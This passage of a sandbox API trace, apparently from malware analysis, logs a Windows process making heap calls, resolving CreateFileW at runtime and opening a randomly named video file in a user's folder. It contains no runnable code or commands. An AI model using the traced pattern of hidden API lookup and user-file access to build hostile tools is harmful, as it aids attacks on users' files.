HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0100.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0100.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0100.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0100.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0100.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0100.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0100.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0100.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0100.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0100.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0100.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0100.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0100.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0100.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0100.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0100.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0100.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0100.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0100.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0100.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0100.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0100.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0100.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0100.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0100.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0100.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0100.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0100.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0100.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0100.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0100.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0100.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0100.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0100.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0100.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0100.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0100.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0100.226] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0100.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0100.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0100.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0100.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0100.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0100.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0100.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0100.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0100.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0100.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0100.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0100.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0100.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0100.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0100.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0100.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0100.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0100.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0100.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0100.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0100.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0100.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0100.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0100.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0100.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0100.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0100.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0100.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0100.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0100.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0100.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0100.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0100.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0100.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0100.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0100.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0100.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0100.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0100.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0100.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0100.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0100.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0100.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0100.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0100.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0100.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0100.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0100.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0100.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0100.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0100.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0100.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0100.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0100.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0100.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0100.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0100.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0100.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0100.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0100.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0100.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0100.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0100.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0100.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0100.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0100.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0100.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0100.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0100.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0100.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0100.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0100.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0100.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0100.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0100.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0100.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0100.228] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0100.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0100.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0100.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0100.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0100.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0100.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0100.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0100.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0100.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0100.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0100.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0100.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0100.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0100.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0100.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0100.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0100.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0100.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0100.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0100.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0100.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0100.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0100.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0100.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0100.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0100.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0100.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0100.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0100.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0100.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0100.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0100.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0100.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0100.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0100.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0100.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0100.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0100.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0100.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0100.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0100.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0100.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0100.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0100.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0100.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0100.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0100.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0100.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0100.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0100.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0100.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0100.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0100.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0100.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0100.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0100.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0100.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0100.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0100.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0100.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0100.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0100.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0100.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0100.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0100.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0100.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0100.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0100.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0100.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0100.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0100.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0100.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0100.231] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0100.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0100.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0100.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca640 [0100.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca640, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0100.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0100.232] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0100.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0100.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0100.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0100.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0100.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0100.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0100.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0100.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0100.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0100.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0100.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0100.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0100.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0100.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0100.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0100.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0100.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0100.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0100.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0100.232] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\rggg9G4RHZvsA0kg01.flv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\rggg9g4rhzvsa0kg01.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0100.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0100.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eab80 [0100.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0100.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0100.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0100.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0100.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0100.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0100.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0100.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0100.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0100.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0100.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0100.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0100.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0100.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0100.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0100.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0100.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0100.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0100.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0100.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0100.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0100.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0100.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0100.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0100.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0100.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0100.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0100.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0100.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0100.234] 